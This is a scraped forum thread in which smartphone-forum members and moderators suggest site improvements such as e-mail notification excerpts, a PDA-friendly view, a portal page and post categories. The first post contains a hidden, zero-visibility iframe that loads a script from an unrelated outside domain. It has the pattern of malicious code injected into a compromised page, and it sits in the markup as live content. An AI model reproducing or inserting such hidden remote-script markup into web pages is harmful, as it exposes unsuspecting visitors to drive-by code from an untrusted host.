+ Reply to Thread

If you could change/add anything to this site....

What would it be? ...

:help Help us make this site even better by offering your suggestions. Feel free to post here or send a private message or email to myself.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    --Jazz--

Re: If you could change/add anything to this site....

Originally posted by jazz
    What would it be? ...

:help Help us make this site even better by offering your suggestions. Feel free to post here or send a private message or email to myself.
    I think the site is GREAT! I really appreciate all of the hard work you & jimmyjoe have put into it :drink1

One thing that I have seen on another board (an ikonboard) is the option to have the latest reply to a thread you are following be included in the body of the e-mail notification. That would be really cool Think that's possible with vBulletin?
    Please visit my picture site: Robert-O-Rama :)

Re: If you could change/add anything to this site....

My vote would be for a "clipped" PDA friendly version of the output, if the hosting software make that possible.

What would it be? ...

:help Help us make this site even better by offering your suggestions. Feel free to post here or send a private message or email to myself.

Re: Re: If you could change/add anything to this site....

Originally posted by Robert K.

One thing that I have seen on another board (an ikonboard) is the option to have the latest reply to a thread you are following be included in the body of the e-mail notification. That would be really cool Think that's possible with vBulletin?
    Excellent idea :clap ! I'll do a little checking to see how to make that happen.
    --Jazz--

Originally posted by rlwhitt
    My vote would be for a "clipped" PDA friendly version of the output, if the hosting software make that possible.
    Yet another excellent idea, and one I'm happy to say is currently in the works :clap
    --Jazz--

Thanks jazz!!! :jump

Mod-Blog's SmartPhone Correspondent

Main Page Summary

An idea was posted on a separate post to provide a summary on the main page of http://www.smartphonesource.com of the main topics/rumors of the day/week/whatever. The thought was that perhaps someone (I'd recommend a volunteer) could cull through the discussion and periodically post the contents to the main page as a low-volume bit of HTML. That way, mobile users could grab the most important info, if time/kilobytes are an issue, from there. More interested/engaging readers would enter the site directly.

Or we could look into a module to vBulletin (no idea if it exists) just to post links to the 10 "most active" stories.

Random thoughts.

Great! We're on the same page... Jimmyjoe is actually already looking into a portal page something like PHP Portals
    to use as the main page for the site.....
    I think he was hoping to get it all researched and implemented very soon (wishful thinking on my part, i hope to see him get it done this evening )
    --Jazz--

Great! We're on the same page... Jimmyjoe is actually already looking into a portal page something like PHP Portals
    to use as the main page for the site.....
    I think he was hoping to get it all researched and implemented very soon (wishful thinking on my part, i hope to see him get it done this evening )
    Sweet! That will be a great addition

Mod-Blog's SmartPhone Correspondent
    Are you looking at a lite front end or something more like a full-fledged CMS (Content Management Software) system? CMS would certainly be cool, as it would give us BLog ability, but might require a lot more manpower to maintain.

But if you are looking for a CMS, I have been looking at PostNuke for a site I have been working on (no its not installed yet) and it looks fairly function-filled and it is free. Also, I believe there are modules to integrate with vBulletin.

Just my two cents.

This has been done....

Let me know what you think... Currently I have only the first 200 characters being sent but I can increase that if you find it necessary...

Thanks for the great idea....
    -=Jimmyjoe=-

Re: Re: Re: If you could change/add anything to this site....

Originally posted by jimmyjoe
    This has been done....

Let me know what you think... Currently I have only the first 200 characters being sent but I can increase that if you find it necessary...

Thanks for the great idea....
    Thanks jimmyjoe!!! I don't think it would hurt anybody if we were to include the whole post, or maybe 500 characters? E-mail with text only doesn't take long to retrieve at any connection speed.

If I could have anything...
    I would like the function of categorization to improve the quality of search results. We've all felt the frustration when a newbie asks a question that has been discussed already, but we've also felt the pain of not being able to direct him/her to the exact spot to get the state-of-the-union information.
    So if I could have anything,
    every post could be "classified" in further detail than the forum topic, and with more concrete choices than self-identification through text searches.
    E.G.
    HotSync Mac
    HotSync Windows
    Palm Software - Productivity
    Palm Software - Phone Interactivity

The categories could be multiple select, so, for example, a post with a question and subsequent discussion could be marked with "HotSync Mac," and the 12th response, that actually gets to the answer/solution could be marked with "HotSync Mac" and "Eureka!" or some such notation. This would dramatically improve the effectiveness of searching through previous posts. (Just think of the time that would be spared on KWPST alone!)

In my imagination, these categories would be self-selected by the poster, but could be adjusted by a moderator. I have bo idea if there is a solution for vBulletin that could address this, but you asked for ANYTHING!

Hey JJ, did you ever increase the number of characters sent in the e-mail notifications? Now that I think about it, it's probably best to keep it where it's at. It wouldn't be good for the hit count on the site if people didn't need to visit to read the replies, right? I don't think that would be a good thing. What do you think? It's nice to get a sneak peek though

Hey JJ, did you ever increase the number of characters sent in the e-mail notifications? Now that I think about it, it's probably best to keep it where it's at. It wouldn't be good for the hit count on the site if people didn't need to visit to read the replies, right? I don't think that would be a good thing. What do you think? It's nice to get a sneak peek though
    I'll up it to 500 when I get back to the ranch....

Thanks....
    -=Jimmyjoe=-

Originally posted by jimmyjoe
    I'll up it to 500 when I get back to the ranch....

Thanks....
    Thanks buddy! Hey... what's the "contributor" tag mean?

p.s. Just curious.... can you think of a reason why on the index page it says that there have been 102 votes in my poll, but if you go to the poll page it says 92! That's kinda weird.